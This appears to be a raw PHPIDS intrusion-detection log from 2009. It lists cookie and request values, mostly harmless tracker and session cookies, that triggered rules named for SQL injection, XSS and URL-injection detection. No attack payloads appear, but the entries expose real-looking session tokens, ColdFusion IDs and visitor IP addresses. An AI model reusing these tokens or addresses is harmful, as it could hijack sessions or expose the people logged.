Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59257
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654854&CFTOKEN#=61107507&jsessionid#=3030d711a181a912d333354718d793c534e4#lastvisit={ts '2009-11-07 19:50:06'}#timecreated={ts '2009-11-07 10:17:12'}#hitcount=6#cftoken=60223183#cfid=1654853#
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59258
Name:COOKIE.PREF
Value:ID=341f2d18c0030793:TM=1257613886:LM=1257613886:S=xZVyiwGwz5KQUvzW
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59259
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59260
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:31:"/gallery/entry/2895/avant-card/";}
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59261
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 11:26:48 AM
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59262
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20342
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59263
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:75:"/article/apple_to_open_stunning_paris_apple_store_in_le_louvre_on_saturday/";i:1;s:33:"/blog/sxsw-panel-picker-overload/";i:2;s:74:"/apple/comment/sleek-audio-announces-more-affordable-sa1-in-ear-earphones/";i:3;s:92:"/weblog/artikel/A-Practical-Guide-to-Designing-for-the-Web-von-Mark-Boulton-A-book-by-Mark-/";}
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59264
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654854&CFTOKEN#=61107507&jsessionid#=3030d711a181a912d333354718d793c534e4#lastvisit={ts '2009-11-07 19:50:06'}#timecreated={ts '2009-11-07 10:17:12'}#hitcount=6#cftoken=60223183#cfid=1654853#
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59265
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59266
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59267
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59268
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59269
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59270
Name:REQUEST.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59271
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59272
Name:REQUEST.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59273
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59274
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59275
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59276
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59277
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59278
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59279
Name:COOKIE.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59280
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59281
Name:COOKIE.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59282
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fpn12%2Fscott-milliken-erin-shelton-beer-hacking-real-world-examples
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59225
Name:REQUEST.PREF
Value:ID=bc9725a4896a3f52:TM=1257636026:LM=1257636026:S=4CFmJle0lsdTN0eO
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59226
Name:REQUEST.language
Value:--
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59227
Name:REQUEST.DsoPub
Value:gd=02343032-f441-4cee-a21d-8e32beb43b3c
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59228
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 1:05:48 PM
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59229
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:62:"/site/berichten/20091106_viral_friday_ken_blocks_trax_sti_car/";i:1;s:59:"/economics/comments/great-examples-of-near-pure-monopolies/";i:2;s:38:"/site/article/will-the-g-20-save-doha/";i:3;s:35:"/events/detail/costume-for-a-cause/";}
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59230
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2643166&CFTOKEN#=13b67ef8b5c90285-CEE8350A-A11B-D013-E3278C3E778EC0CA&jsessionid#=3030cfe8e7ad1c6abfdb2231769777587061#lastvisit={ts '2009-11-07 19:50:07'}#timecreated={ts '2009-11-07 13:48:17'}#hitcount=10#cftoken=13b67ef8b5c90285-CEE8350A-A11B-D013-E3278C3E778EC0CA#cfid=2643166#
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59231
Name:COOKIE.PREF
Value:ID=bc9725a4896a3f52:TM=1257636026:LM=1257636026:S=4CFmJle0lsdTN0eO
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59232
Name:COOKIE.language
Value:--
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59233
Name:COOKIE.DsoPub
Value:gd=02343032-f441-4cee-a21d-8e32beb43b3c
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59234
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 1:05:48 PM
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59235
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:62:"/site/berichten/20091106_viral_friday_ken_blocks_trax_sti_car/";i:1;s:59:"/economics/comments/great-examples-of-near-pure-monopolies/";i:2;s:38:"/site/article/will-the-g-20-save-doha/";i:3;s:35:"/events/detail/costume-for-a-cause/";}
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59236
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2643166&CFTOKEN#=13b67ef8b5c90285-CEE8350A-A11B-D013-E3278C3E778EC0CA&jsessionid#=3030cfe8e7ad1c6abfdb2231769777587061#lastvisit={ts '2009-11-07 19:50:07'}#timecreated={ts '2009-11-07 13:48:17'}#hitcount=10#cftoken=13b67ef8b5c90285-CEE8350A-A11B-D013-E3278C3E778EC0CA#cfid=2643166#
Page:/security-podcasts.php
IP:89.149.217.23
Impact:136
Created:2009-11-07 17:37:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59154
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:54:"/news/permalink/all-about-shadow-volumes-presentation/";i:1;s:52:"/site/article/why-australia-should-not-adopt-an-ets/";i:2;s:72:"/apple/comment/appletell-reviews-the-bookarc-desktop-stand-for-macbooks/";i:3;s:83:"/weblog/artikel/Drei-Abos-warten-Das-Webstandards-Magazin-geht-in-die-zweite-Runde/";}
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59155
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"408fb43b93e16a02874ea901d1b6eb45";s:10:"ip_address";s:12:"78.46.48.164";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671906";}5d6d952fc2b5121dc8db56822d73a180
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59156
Name:COOKIE.PREF
Value:ID=09c17c76509a0f4a:TM=1257597012:LM=1257597012:S=IPVAqwxbzQUnWbHo
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59157
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20353
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59158
Name:COOKIE.DB
Value:msRandX=46&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59159
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=2203982&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59160
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:27:"/gallery/entry/2918/pulse8/";}
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59161
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=12072999&CFTOKEN#=95503253&jsessionid#=3030926fd567a4f251d77b785b61a6f03749#lastvisit={ts '2009-11-07 18:20:06'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=10#cftoken=26242667#cfid=1647418#
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59162
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:35 GMT
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59163
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:54:"/news/permalink/all-about-shadow-volumes-presentation/";i:1;s:52:"/site/article/why-australia-should-not-adopt-an-ets/";i:2;s:72:"/apple/comment/appletell-reviews-the-bookarc-desktop-stand-for-macbooks/";i:3;s:83:"/weblog/artikel/Drei-Abos-warten-Das-Webstandards-Magazin-geht-in-die-zweite-Runde/";}
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59164
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"408fb43b93e16a02874ea901d1b6eb45";s:10:"ip_address";s:12:"78.46.48.164";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671906";}5d6d952fc2b5121dc8db56822d73a180
Page:/i.php?page=videos%2Fpn12%2Fskydog-crew-starting-your-own-hackerspace-panel-talk
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59165
Name:REQUEST.language
Value:--
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59166
Name:REQUEST.DB
Value:msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Fddwrt-csrf-example
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59167
Name:REQUEST.Cart
